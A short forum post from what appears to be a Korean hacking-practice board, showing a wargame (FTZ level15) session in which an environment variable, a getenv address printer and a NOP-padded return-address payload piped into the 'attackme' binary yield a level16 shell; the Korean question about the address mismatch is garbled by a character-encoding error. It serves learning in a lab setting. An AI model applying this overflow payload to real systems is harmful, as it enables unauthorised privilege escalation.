http://www.hackerschool.org/HS_Boards/zboard.php?desc=desc&no=1910 [º¹»ç]
[level15@ftz tmp]$export SCD=`python -c 'print "\xef\xbe\xad\xde"'`
#include <stdio.h>
main()
{
printf("Address of SHELLCODE : 0x%x\n", getenv("SCD"));
}
[level15@ftz tmp]$ ./abc
Address of SHELLCODE : 0xbffffe87
[level15@ftz tmp]$ (python -c 'print "\x90"*40+"\x87\xfe\xff\xbf"';cat) | ../attackme
[level15@ftz tmp]$ (python -c 'print "\x90"*40+"\x7B\xfe\xff\xbf"';cat) | ../attackme
whoami
level16
getenv¸¦ ÀÌ¿ëÇÏ¿© ³ª¿Â ÁÖ¼Ò´Â bffffe87 Àε¥ ½ÇÁ¦ °ø°ÝÀ» ¼öÇàÇÏ·Á¸é bffffe7b¸¦ ÀÔ·ÂÀ» ÇØÁà¾ß °ø°ÝÀÌ ¼öÇà µÇ´õ¶ó°í¿ä.
ȯ°æº¯¼ö¸¦ ÀÌ¿ëÇÏ¿©¼ ¹®Á¦¸¦ Ç®¶§¸¶´Ù °ø°Ý½Ã ÀÌ¿ëÇÏ´Â ÁÖ¼Ò¶û getenvÀÇ Ãâ·Â °ªÀ̶û ´Ù¸£´øµ¥ ÀÌÀ¯¶û ±× »çÀÌ °ª¿¡´Â ¾î¶² °ªµéÀÌ µé¾î°¡°Ô µÇ´ÂÁö ¾Ë·ÁÁֽǼö ÀÖÀ¸½Å°¡¿ä? ¤Ð¤Ð |
Hit : 2414 Date : 2018/01/02 04:12
|